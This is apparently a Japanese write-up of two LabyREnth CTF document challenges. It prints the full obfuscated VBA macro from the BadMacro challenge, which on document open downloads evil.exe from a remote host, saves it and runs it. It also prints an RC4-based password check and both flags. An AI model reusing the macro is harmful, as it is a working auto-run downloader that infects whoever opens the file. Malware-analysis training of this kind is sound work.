LabyREnth CTF (Docs)
1. はじめに
2. writeup
・BadMacro (Docs Lv1)
zipを解凍する(Pass : infected)とchallenge.docが出てくる.
challenge.docからVBAを抽出する.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function QklkhFEQNB(HGKuttPaRM As Variant, UBvkWqzieX As Integer)
Dim gsFEVmmIzO, vSHOfSrEta As String, dHLdiEqdts, eUTAbMoUIA
vSHOfSrEta = ActiveDocument.Variables("ppKzr").Value()
gsFEVmmIzO = ""
dHLdiEqdts = 1
While dHLdiEqdts < UBound(HGKuttPaRM) + 2
eUTAbMoUIA = dHLdiEqdts Mod Len(vSHOfSrEta): If eUTAbMoUIA = 0 Then eUTAbMoUIA = Len(vSHOfSrEta)
gsFEVmmIzO = gsFEVmmIzO + Chr(Asc(Mid(vSHOfSrEta, eUTAbMoUIA + UBvkWqzieX, 1)) Xor CInt(HGKuttPaRM(dHLdiEqdts - 1)))
dHLdiEqdts = dHLdiEqdts + 1
Wend
QklkhFEQNB = gsFEVmmIzO
End Function
Public Function BkAIuNwQNDkohBY()
twOvwCSTPL = QklkhFEQNB(Array(5, 5, 27, 65, 89, 98, 85, 86, 71, 75, 66, 92, 95, 98, 67, 64, 89, 83, 84, 95, 26, _
78, 116, 78, 91, 5, 116, 32, 72, 2, 33, 48, 10, 29, 61, 8, 37, 20, 63, 44, 1, _
12, 62, 38, 47, 52, 99, 57, 5, 121, 89, 37, 65, 32, 32, 11, 98, 42, 58, 32, 28, _
9, 3, 117, 85, 4, 57, 10, 94, 0, 16, 8, 28, 42, 30, 121, 71, 6, 8, 9, 37, _
2, 23, 34, 21, 120, 54, 7, 40, 35, 75, 50, 87, 3, 55, 47, 99, 52, 13, 0, 42, _
30, 27, 126, 59, 3, 123, 29, 52, 44, 53, 29, 15, 50, 12, 35, 8, 48, 89, 54, 27, _
62, 28, 8, 36, 49, 119, 104, 14, 5, 64, 34, 43, 22, 71, 5, 46, 7, 66, 42, 0, _
1, 113, 97, 83, 31, 45, 95, 111, 31, 40, 51), 24)
UkIWIEtqCF = QklkhFEQNB(Array(42, 115, 2), 188)
Dim xHttp: Set xHttp = CreateObject(QklkhFEQNB(Array(116, 7, 6, 74, 60, 43, 42, 36, 64, 70, 110, 27, 28, 12, 12, 17, 23), 0))
Dim bStrm: Set bStrm = CreateObject(QklkhFEQNB(Array(15, 32, 32, 53, 35, 89, 22, 25, 65, 53, 51, 26), 176))
xHttp.Open UkIWIEtqCF, twOvwCSTPL, False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17), 2
End With
Shell (QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17))
End Function
Private Sub Document_Open()
If ActiveDocument.Variables("ppKzr").Value <> "toto" Then
BkAIuNwQNDkohBY
ActiveDocument.Variables("ppKzr").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
しかしこのままでは可読性が悪いので変数名等を書き換えて整形する.
これをVBE上で実行する. ただしHTTPリクエストとシェル実行はされたくないのでコメントアウトして, Debug.Printを用いてイミディエイトウインドウに出力した.
http://10.1.33.7/b64/x58/MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=/evil.exe に注目してb64とx58という文字列があるので, base64とXOR 0x58と予想してPythonでデコードするスクリプトを書いた.
FLAG : PAN{ViZib13_0nly2th0s3_Wh0_Kn0w_wh3r32l00k}
・CrackDoc (Docs Lv2)
zipを解凍する(Pass : infected)とCrackDoc.docが出てくる.
UserFormにパスワードを入力すれば良い. 同様にVBAを抽出する.
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8AF7E01A-2331-4925-95C1-AA63132A39D5}{BF4AE4DE-16B1-4C4B-ABB6-3A501B9C5B0F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub button_Click()
x = suchcrypto(key.Text, "General Vidal")
If x = "171,184,42,184,88,26,47,154,20,219,203,130,52,19,180,214,156,94,186,74,30,248,119,235,139,130,175,141,179,197,8,204,252," Then
MsgBox "Wow. Good Job! Such crack."
Else
MsgBox "U can do. Try harder..."
End If
End Sub
Function suchcrypto(sMessage, strKey)
Dim kLen, x, y, i, j, temp
Dim s(256), k(256)
kLen = Len(strKey)
For i = 0 To 255
s(i) = i
k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
Next
j = 0
For i = 0 To 255
j = (j + k(i) + s(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
Next
x = 0
y = 0
For i = 1 To 3072
x = (x + 1) Mod 256
y = (y + s(x)) Mod 256
temp = s(x)
s(x) = s(y)
s(y) = temp
Next
For i = 1 To Len(sMessage)
x = (x + 1) Mod 256
y = (y + s(x)) Mod 256
temp = s(x)
s(x) = s(y)
s(y) = temp
suchcrypto = suchcrypto & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
Next
End Function
FLAG : PAN{L4$t_Night_@f@iry_Vizited_M3}
3. 補足
公式にてwriteupが公開されている. 1week毎に1trackずつ公開される模様.
researchcenter.paloaltonetworks.com
kmdnet